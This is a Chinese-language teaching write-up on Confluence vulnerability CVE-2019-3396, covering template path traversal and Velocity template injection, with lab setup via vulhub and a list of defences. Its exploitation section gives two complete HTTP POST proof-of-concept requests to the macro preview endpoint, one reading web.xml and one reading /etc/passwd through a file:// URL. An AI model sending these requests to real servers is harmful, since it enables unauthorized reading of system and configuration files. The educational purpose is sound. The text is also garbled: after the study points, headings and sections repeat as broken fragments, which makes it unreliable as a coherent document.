Confluence漏洞分析与利用教学文档<\/h1>

1. Confluence简介<\/h2>
Atlassian Confluence是企业广泛使用的wiki系统，基于Struts架构开发，在各大企业中被广泛使用。<\/p>

2. CVE-2019-3396漏洞分析<\/h2>

2.1 漏洞概述<\/h3>

影响版本：Confluence 6.14.2之前版本<\/li>
漏洞类型：未授权目录穿越漏洞<\/li>

危害：可读取任意文件，或利用Velocity模板注入执行任意命令<\/li> <\/ul>

2.2 漏洞原理<\/h3>

在预览功能中可以指定模板<\/li>
系统未对模板路径和协议进行限制<\/li>

可通过

file:\/\/\/etc\/passwd<\/code>读取文件或https:\/\/...<\/code>加载远程文件<\/li>
<\/ol>
2.3 RCE原理<\/h3>

系统使用Velocity模板<\/li>
可通过远程加载模板文件实现模板注入<\/li>
预览功能请求包中无_template<\/code>参数，需手动添加（白盒审计才能发现）<\/li>
<\/ul>
3. 模板获取方式<\/h2>
系统通过四种方式获取模板，主要利用以下两种：<\/p>


FileResourceLoader<\/strong><\/p>

路径：velocity-1.6.4-atlassian-9.jar<\/li>
通过文件名加载模板<\/li>
不可跨目录加载（StringUtil.normalizePath过滤了\/..\/）<\/li>
<\/ul>
<\/li>

ClasspathResourceLoader<\/strong><\/p>

通过file:\/\/等协议加载文件<\/li>
先拼接类资源路径WebappPath<\/li>
当WebappPath打开流失败时，调用catalina.jar中的WebappClassLoaderBase.class父类findResource获取URL<\/li>
<\/ul>
<\/li>
<\/ol>
4. 环境搭建<\/h2>
使用vulhub环境进行复现：<\/p>

访问http:\/\/your-ip:8090<\/code>进入安装引导<\/li>
选择"Trial installation"<\/li>
申请Confluence Server测试证书（不要选择Data Center和Addons）<\/li>
填写数据库信息<\/li>
<\/ol>
5. 漏洞利用<\/h2>
5.1 读取web.xml文件POC<\/h3>
POST<\/span> \/rest\/tinymce\/1\/macro\/preview HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> localhost:8090<\/span>
<\/span><\/span>Accept-Encoding:<\/span> gzip, deflate<\/span>
<\/span><\/span>Accept:<\/span> *\/*<\/span>
<\/span><\/span>Accept-Language:<\/span> en<\/span>
<\/span><\/span>User-Agent:<\/span> Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident\/5.0)<\/span>
<\/span><\/span>Connection:<\/span> close<\/span>
<\/span><\/span>Referer:<\/span> http:\/\/localhost:8090\/pages\/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&<\/span>
<\/span><\/span>Content-Type:<\/span> application\/json; charset=utf-8<\/span>
<\/span><\/span>Content-Length:<\/span> 176<\/span>
<\/span><\/span>
<\/span><\/span>{"contentId"<\/span>:"786458"<\/span>,"macro"<\/span>:{"name"<\/span>:"widget"<\/span>,"body"<\/span>:""<\/span>,"params"<\/span>:{"url"<\/span>:"https:\/\/www.viddler.com\/v\/23464dc6"<\/span>,"width"<\/span>:"1000"<\/span>,"height"<\/span>:"1000"<\/span>,"_template"<\/span>:"..\/web.xml"<\/span>}}}
<\/span><\/span><\/code><\/pre>5.2 利用file协议读取本地任意文件<\/h3>
Confluence 6.12之前版本未限制文件读取协议和路径：<\/p>
POST<\/span> \/rest\/tinymce\/1\/macro\/preview HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 10.0.0.100:8090<\/span>
<\/span><\/span>Content-Length:<\/span> 184<\/span>
<\/span><\/span>Accept:<\/span> text\/html, *\/*; q=0.01<\/span>
<\/span><\/span>User-Agent:<\/span> Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/83.0.4103.116 Safari\/537.36<\/span>
<\/span><\/span>Content-Type:<\/span> application\/json<\/span>
<\/span><\/span>Accept-Encoding:<\/span> gzip, deflate<\/span>
<\/span><\/span>Connection:<\/span> close<\/span>
<\/span><\/span>
<\/span><\/span>{"contentId"<\/span>:"12345"<\/span>,"macro"<\/span>:{"name"<\/span>:"widget"<\/span>,"body"<\/span>:""<\/span>,"params"<\/span>:{"url"<\/span>:"file:\/\/\/etc\/passwd"<\/span>,"width"<\/span>:"1000"<\/span>,"height"<\/span>:"1000"<\/span>,"_template"<\/span>:"..\/web.xml"<\/span>}}}
<\/span><\/span><\/code><\/pre>6. 防御措施<\/h2>

升级到Confluence 6.14.2或更高版本<\/li>
限制模板加载的路径和协议<\/li>
实施严格的输入验证<\/li>
对Velocity模板渲染进行安全配置<\/li>
<\/ol>
7. 学习要点<\/h2>

Velocity模板注入原理<\/li>
变量覆盖漏洞利用方式<\/li>
目录穿越漏洞的检测方法<\/li>
白盒审计技巧（发现隐藏参数）<\/li>
<\/ol>

Confluence漏洞分析与利用教学文档<\/h1>

1. Confluence简介<\/h2> Atlassian Confluence是企业广泛使用的wiki系统，基于Struts架构开发，在各大企业中被广泛使用。<\/p>

2. CVE-2019-3396漏洞分析<\/h2>

5. 漏洞利用<\/h2>

7. 学习要点<\/h2> Velocity模板注入原理<\/li> 变量覆盖漏洞利用方式<\/li> 目录穿越漏洞的检测方法<\/li> 白盒审计技巧（发现隐藏参数）<\/li> <\/ol>

1. Confluence简介<\/h2>
Atlassian Confluence是企业广泛使用的wiki系统，基于Struts架构开发，在各大企业中被广泛使用。<\/p>

7. 学习要点<\/h2>

Velocity模板注入原理<\/li>
变量覆盖漏洞利用方式<\/li>
目录穿越漏洞的检测方法<\/li>
白盒审计技巧（发现隐藏参数）<\/li> <\/ol>